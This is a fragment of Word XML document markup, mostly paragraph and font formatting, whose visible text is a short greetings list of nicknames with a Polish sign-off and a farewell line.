        <w:ind w:right="-1726"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ind w:right="-1726"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reet "Int19h,Smyk,Mt666,Cyber,Phantom,Bajbi,Slicer,Sleid,Siemce,Slabik,Ravn,_3mil,w32stbam,guma,GHOST,Klev</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726"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jak kogos pominalem to sorki daj znac to osobiscie cie pozdrowie </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726"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ind w:right="-1726"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 ya seen in next life</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726"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ind w:right="-1726"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56" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726"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ogout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726"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Times New Roman CE">
    <w:charset w:val="ee"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Courier New CE">
    <w:charset w:val="ee"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="MT Symbol">
    <w:altName w:val="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